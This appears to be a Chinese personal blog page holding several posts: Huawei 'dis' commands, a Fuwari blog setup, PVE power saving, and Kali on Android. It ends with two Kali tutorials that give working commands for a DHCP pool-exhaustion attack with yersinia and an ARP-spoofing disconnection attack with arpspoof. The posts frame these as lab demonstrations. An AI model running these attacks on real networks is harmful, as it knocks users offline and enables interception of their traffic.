ShiraNeko Blog

归纳总结华为CLI的dis命令的使用

Tue, 30 Jun 2026 00:00:00 GMT

概述

在华为网络设备的CLI（命令行界面）中，dis 命令是 display 命令的缩写，是最常用的查看命令之一。它用于显示设备的配置信息、运行状态、接口信息等各种重要数据，是网络工程师进行设备管理和故障排查的得力工具。

常用 dis 命令分类

1. 设备基本信息查看

# 显示设备版本信息
dis version

# 显示设备运行状态
dis device

# 显示设备当前配置
dis current-configuration

# 显示设备保存的配置
dis saved-configuration

# 显示设备时钟
dis clock

2. 接口信息查看

# 显示所有接口的简要信息
dis ip interface brief

# 显示指定接口的详细信息
dis interface GigabitEthernet 0/0/1

# 显示接口的流量统计
dis interface GigabitEthernet 0/0/1 statistics

# 显示接口的IP地址配置
dis ip interface GigabitEthernet 0/0/1

3. 路由信息查看

# 显示IP路由表
dis ip routing-table

# 显示特定协议的路由
dis ip routing-table protocol ospf

# 显示路由表的统计信息
dis ip routing-table statistics

4. 交换机相关命令

# 显示MAC地址表
dis mac-address

# 显示VLAN信息
dis vlan

# 显示生成树信息
dis stp

# 显示链路聚合信息
dis eth-trunk

5. 网络服务信息查看

# 显示ARP表
dis arp

# 显示DHCP相关信息
dis dhcp server lease

# 显示NAT转换表
dis nat session

# 显示ACL信息
dis acl all

使用技巧

1. 命令补全

按 Tab 键可以自动补全命令，减少输入错误。

dis cu  # 等同于 dis current-configuration
dis ip int br  # 等同于 dis ip interface brief

2. 管道过滤

使用 | 符号配合过滤命令，快速查找所需信息。

# 只显示包含"GigabitEthernet"的行
dis interface | include GigabitEthernet

# 排除某些信息
dis current-configuration | exclude unused

# 分屏显示
dis current-configuration | more

3. 历史命令

使用 Ctrl+P 或 ↑ 键查看历史命令，提高效率。

注意事项

dis 命令是只读命令，不会对设备配置产生影响
在使用 display current-configuration 查看配置时，某些敏感信息可能会被加密显示
对于大型配置，建议使用管道命令进行过滤查看

总结

熟练掌握 dis 命令的使用，是华为网络设备运维的基础。通过合理运用各种 display 命令及其过滤功能，可以快速定位问题、了解设备状态，为网络管理和故障排查提供有力支持。

Fuwari本地部署教程

Wed, 24 Jun 2026 00:00:00 GMT

在本地部署Fuwari

需要以下准备

一点折腾能力，不会可以问ai
Node.js: Fuwari需要Node.js16及以上版本
git: Fuwari需要git来克隆仓库
一点Markdown基础语法

部署步骤

将仓库克隆到本地: git clone <仓库URL>
全局安装pnpm: npm install -g pnpm
安装依赖: pnpm install
Fuwari部署完成

更改Fuwari基础信息，清理多余文件

在根目录找到config.json文件，编辑其中的配置项

'title': 博客的主标题
'subtitle': 副标题
'name': 作者姓名
'avatar': 作者头像
'bio': 个性签名（显示在头像下）
'lang': 博客的语言，例如zh_CN
'themeColor': 主题颜色
'banner': 网站的banner背景图片
'favicon': 网站的favicon图标
'link': 友情链接
'description': 网站的描述

清理多余文件。根目录下src/content/posts有示例文章，可以根据需要删除。
完成设置

让我们开始写作！

[Linux]PVE降低空载功耗&开启linux省电模式

Sun, 27 Apr 2025 03:26:00 GMT

PVE降低空载功耗&开启linux省电模式

PVE(Proxmox Virtual Environment)是一个开源的虚拟化平台，它允许用户在服务器上创建虚拟机，并使用Linux操作系统来运行各种应用程序。

安装cpufrequtils

apt install cpufrequtils

cpufreq-info
# 显示CPU频率信息
acpi-cpufreq驱动:
performance 性能模式，将 CPU 频率固定工作在其支持的较高运行频率上，而不动态调节。
userspace 系统将变频策略的决策权交给了用户态应用程序，较为灵活。
powersave 省电模式，CPU 会固定工作在其支持的最低运行频率上。
ondemand 按需快速动态调整 CPU 频率，没有负载的时候就运行在低频，有负载就高频运行。
conservative 与 ondemand 不同，平滑地调整 CPU 频率，频率的升降是渐变式的，稍微缓和一点。
schedutil 负载变化回调机制，后面新引入的机制，通过触发 schedutil sugov_update 进行调频动作。
intel_pstate驱动:
performance 最大化 CPU 性能
powersave 优化能效 平衡性能与功耗 相比acpi-cpufreq powersave调节器更智能 响应更快 高负载下可能略逊于performance模式 但日常使用差异通常不明显

设置CPU电源策略

cpupower -c all frequency-set --governor powersave

前后对比：

设置CPU电源策略前：

设置CPU电源策略后：

[kali]适用于Android设备的kali移动版

Fri, 25 Apr 2025 06:06:00 GMT

适用于Android设备的kali移动版

设备: 一台已root或可root的Android设备
软件: Magisk(面具)模块
软件包: kali-linux-mobile-2023.1-r1.zip
获取Kali|卡利Linux

下载ARM64完整zip包

在magisk模块页点击[从本地安装]选项，选择zip包，点击安装。

启用kali模块，重启手机

打开生成在手机桌面的命令行终端软件

（启用kali模块重启后终端自动生成在桌面）

[kali]DHCP欺骗攻击

Fri, 25 Apr 2025 03:27:00 GMT

DHCP欺骗攻击（耗尽地址池，附带yersinia编译安装解决方案）

*系统: kali *主机: Pve虚拟机 *工具: advanced ip scanner局域网设备ip扫描工具 *Linux软件: yersinia 本文演示攻击环境为内网虚拟机环境，不影响公共网络

yersinia是一款底层协议入侵工具，它能伪装多种协议的报文并实施欺骗和攻击。 Yersinia具体可以虚拟的报文如下：

Spanning Tree Protocol (STP)

Cisco Discovery Protocol (CDP)

Dynamic Trunking Protocol (DTP)

Dynamic Host Configuration Protocol (DHCP)

Hot Standby Router Protocol (HSRP)

IEEE 802.1QIEEE 802.1X

Inter-Switch Link Protocol (ISL)

VLAN Trunking Protocol (VTP)

例如：夺取生成树stp的根角色，生成虚拟cdp（cisco 发现协议）邻居。在一个hsrp冗余型网络环境中伪装成一个活动的路由器、制造假dhcp 报文反馈，耗尽dhcp 地址池等等。

安装yersinia工具

sudo apt-get install yersinia

Yersinia常用命令参数

命令行使用方法
yersinia Protocol -interface eth -attack id
# 示例：
yersinia dhcp -interface eth0 -attack 0
 
 
h       帮助屏幕
x       选择并执行攻击
i       选择网卡
ENTER   关于选择项目的信息
v       查看数据包的16进制
d       加载协议默认值
e       编辑数据表字段
f       列出捕获文件
s       从协议保存数据包
S       保存-来自所有协议的数据包
L       从网络学习数据包
N       设置Mac欺骗开/关
l       列出正在运行的攻击
K       杀死所有正在运行的攻击
c       清除当前协议statc
C       清除所有协议状态
g       转到其他协议屏幕
ctrl-l  重绘屏幕
w       写入配置文件
a       关于这个工具
q       退出

启动图形化界面

yersinia -G

使用示例

点击Launch Attack，选着DHCP选项卡，选着sending DISCOVER packet，并勾选Dos选项，点击OK保存

点击菜单的Action中的execute attack执行攻击

无法启动GUI模式（-G）解决方案

先完全卸载yersinia包和依赖

apt remove --auto-remove yersinia
apt purge --auto-remove yersinia

从github克隆编译安装

git clone https://github.com/tomac/yersinia /opt/yersinia
// 从github克隆到/opt/yersinia
apt install autoconf libgtk-3-dev libnet1-dev libgtk2.0-dev libpcap-dev -y
// 安装一些编译所需的依赖包(这些包是必须的)

// 编译：
cd /opt/yersinia
./autogen.sh
// 用gtk编译yersinia
./configure --with-gtk
// 完成编译
make
make install

// 打开yersinia GUI
yersinia -G

[kali]局域网单向ARP断网攻击

Thu, 24 Apr 2025 19:22:00 GMT

环境准备&介绍

*系统：kali-linunx *主机：Pve 虚拟机 *工具：arp-spoof + scan ora advanced ip scanner *linux软件：dsniff *目的：对局域网进行ARP断网攻击，或者进行中间人抓包 请注意，ARP攻击可能会对网络造成严重干扰，请确保您有合法的权限进行此类操作。

单向ARP介绍

单向ARP欺骗也称为断网攻击，攻击机伪造数据包后本应该传输给靶机的数据错误的传输给攻击机，使靶机得不到服务器的响应数据，甚至根本无法将数据包发送出局域网。

任务实施

apt-get update
// 更新源
apt-get install dsniff
// 下载arp攻击工具
route -n
// 查看网关IP
ifconfig eth(0/1/2/3...)
// 查看网络接口连接详细信息
arpspoof -i eth0 -t 目标IP -r 网关IP
// 在控制台Ctrl-C就能结束攻击

多个目标IP

-t

指定arp攻击的目标。若是不指定，则目标为该局域网内的全部机器。能够指定多个目标，如

arpspoof -i eth0 -t 192.168.32.100 -t 192.168.32.101